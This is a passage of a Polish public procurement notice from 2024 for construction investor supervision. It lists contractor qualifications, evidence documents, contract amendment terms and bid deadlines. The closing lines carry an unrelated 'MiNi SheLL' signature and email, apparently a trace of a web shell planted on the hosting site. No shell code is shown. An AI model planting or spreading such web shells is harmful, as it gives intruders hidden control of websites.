zł,<br/>b) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia na sumę gwarancyjna nie niższą niż 200.000,00 zł;<br/>4. Zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeśli wykaże, że:<br/>1) w okresie ostatnich 5 lat, licząc od upływu terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie – wykonał zgodnie z obowiązującymi przepisami oraz zasadami wiedzy technicznej i ukończył w terminie co<br/>najmniej 1 usługę polegającą na sprawowaniu nadzoru inwestorskiego nad realizacją inwestycji polegającej na budowie,<br/>przebudowie, modernizacji lub remoncie budynku (w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn.<br/>Dz.U. 2023r. poz. 682 ze zm.) o wartości robót budowlanych nie mniejszej niż 3.000.000,00 zł brutto, przy czym w ramach<br/>inwestycji powinny być wykonywane roboty w branżach: konstrukcyjno-budowlanej, sanitarnej i elektrycznej oraz załączy<br/>dowody określające czy usługi te zostały wykonane należycie lub w przypadku świadczeń okresowych lub ciągłych – są<br/>wykonywane należycie (wypełnić w tabeli zawartej w Załączniku nr 4 do SWZ).Powołując się na § 9 ust 4 pkt. 2 Rozporządzenia z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. 2020 poz. 2415) - usługa<br/>wykonana nie wcześniej niż w okresie ostatnich 5 lat (licząc wstecz od dnia upływu termin składania ofert) a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem dat wykonania i podmiotów, na rzecz których usługi<br/>zostały wykonane lub są wykonywane oraz załączyć dowody określające czy usługa ta została wykonana należycie lub w<br/>przypadku świadczeń okresowych lub ciągłych – jest wykonywana należycie. Wykazane przez Wykonawcę zadanie na<br/>dzień złożenia ofert powinno być wykonane, tj. zakończone np. protokołem odbioru końcowego lub innym równoważnym<br/>dokumentem. Pod pojęciem rozpoczęcia usługi Zamawiający przyjmuje termin przekazania placu budowy dla Wykonawcy,<br/>zaś jako zakończenie zadania przyjmuje datę zakończenia realizacji usługi czyli zakończenie wykonania usługi i jej<br/>odebranie, udokumentowane protokołem odbioru podpisanym bez uwag lub innym równoważnym dokumentem.<br/>Zamawiający nie dopuszcza łączenia kilku inwestycji w celu uzyskania kwoty 3.000.000,00 zł brutto.<br/>Wartości pieniężne wskazane w dokumentach potwierdzających spełnianie warunku udziału w postępowaniu, podane w<br/>walutach innych niż PLN, Wykonawca przeliczy na złote polskie wg średniego kursu walut NBP obowiązującego w dniu<br/>podpisania końcowego protokołu odbioru robót lub innego równoważnego dokumentu.<br/>2) dysponuje osobami, o odpowiednich kwalifikacjach zawodowych, uprawnieniach, doświadczeniu i wykształceniu<br/>niezbędnym do wykonywania zamówienia publicznego (wypełnić w tabeli zawartej w Załączniku nr 5 do SWZ). tj.:<br/>a) kierownikiem zespołu inspektorów nadzoru - inżynier wiodący (1 osoba):<br/>- posiadającym uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do projektowania i nadzoru nad robotami<br/>budowlanymi bez ograniczeń,<br/>- posiadającym co najmniej 5 letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych w specjalności<br/>konstrukcyjno – budowlanej bez ograniczeń,<br/>- posiada doświadczenie zawodowe w nadzorowaniu co najmniej 1 zadania inwestycyjnego polegającego na budowie,<br/>przebudowie, modernizacji lub remoncie budynku (w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane), w okresie<br/>ostatnich 5 lat, licząc od upływu terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>o wartości robót budowlanych nie mniejszej niż 3.000.000,00 zł brutto, przy czym w ramach inwestycji powinny być<br/>wykonywane roboty w branżach: konstrukcyjno-budowlanej, sanitarnej i elektrycznej. Powołując się na § 9 ust 4 pkt. 2<br/>Rozporządzenia z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. 2020 poz. 2415) - usługa wykonana nie wcześniej niż<br/>w okresie ostatnich 5 lat (licząc wstecz od dnia upływu termin składania ofert) a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są<br/>wykonywane oraz załączyć dowody określające czy usługa ta została wykonana należycie lub w przypadku świadczeń<br/>okresowych lub ciągłych – jest wykonywana należycie.<br/>b) inspektorami nadzoru wchodzącymi w skład wielobranżowego zespołu nadzoru, przy czym każdy z nich powinien<br/>posiadać uprawnienia do nadzoru nad robotami budowlanymi w danej specjalności oraz co najmniej 3 letnie doświadczenie<br/>zawodowe w nadzorowaniu robót w danej specjalności:<br/> inspektor nadzoru robót sanitarnych (1 osoba) powinien posiadać uprawnienia budowlane do projektowania i nadzoru nad<br/>robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,<br/>wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych – w zakresie objętym przedmiotem zamówienia<br/> inspektor nadzoru robót elektrycznych (1 osoba) powinien posiadać uprawnienia budowlane do projektowania i nadzoru nad<br/>robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych- w zakresie objętym przedmiotem zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)<br/>wykaz wykonanych usług – według wzoru załącznika nr 4 do SWZ - wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>usługi te zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty<br/>2) wykaz osób skierowanych do realizacji zamówienia – według wzoru załącznika nr 5 do SWZ – w szczególności odpowiedzialnych<br/>za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami<br/>3) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;<br/>4) dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) oświadczenie wykonawcy<br/>o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z<br/>postępowania wskazanych przez zamawiającego – według wzoru załącznika nr 2 do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Według SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmian postanowień zawartej Umowy, w przypadku wystąpienia co najmniej jednej<br/>okoliczności z wymienionych poniżej:<br/>1) Zmiana terminu realizacji Umowy (nie więcej niż o uzasadniony okres wydłużenia terminu realizacji wynikający z<br/>poniższych okoliczności):<br/>Ogłoszenie nr 2024/BZP 00048425 z dnia 2024-01-18<br/>2024-01-18 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym<br/>na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>a) w przypadku następstwa działania organów administracji, w szczególności przekroczenie określonych przez prawo<br/>terminów wydawania przez organy administracji decyzji, zezwoleń, uzgodnień itp.; zmiany wydanych wcześniej przez<br/>organy administracji decyzji, zezwoleń, uzgodnień itp.; odmowa wydania przez organy administracji wymaganych decyzji,<br/>zezwoleń, uzgodnień itp.; o ile ww. okoliczności nie są następstwem winy umyślnej lub nieumyślnej Wykonawcy i o ile<br/>opóźnieniom tym Wykonawca nie mógł zapobiec działając z najwyższą starannością,<br/>b) konieczność zrealizowania robót przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w<br/>dokumentacji projektowej lub specyfikacji technicznej,<br/>Na podstawie art. 436 pkt 4) lit. b) ustawy Prawo zamówień publicznych, dopuszcza się możliwość zmiany wysokości<br/>wynagrodzenia, o którym mowa w § 4 ust. 1 umowy, w przypadku, gdy konieczność wprowadzenia zmian implikowana jest<br/>zmianą powszechnie obowiązujących przepisów prawa dotyczących:<br/>a) ustawowej stawki podatku od towarów i usług (VAT), czy podatku akcyzowego<br/>b) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej,<br/>c) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu, czy też wysokości stawki składki na<br/>ubezpieczenia społeczne lub zdrowotne –<br/>d) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4<br/>października 2018 r. o pracowniczych planach kapitałowych (PPK) – wówczas w przypadku wykazania przez Wykonawcę, iż<br/>zmiana ta wpływa na koszty<br/>1) Zmiany osób wyznaczonych do pełnienia funkcji, jak też powołania nowych w przypadku śmierci, rozwiązania stosunku<br/>pracy, utraty uprawnień do pełnienia funkcji oraz zaistnienia zdarzeń losowych z przyczyn niezależnych od Zamawiającego<br/>oraz Wykonawcy, skutkujących obiektywną niemożliwością pełnienia funkcji przez daną osobę.<br/>2) Zmiany podwykonawcy lub rezygnacji z udziału podwykonawcy przy realizacji przedmiotu zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-03-19 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać na e-zamowieniach</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-03-19 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com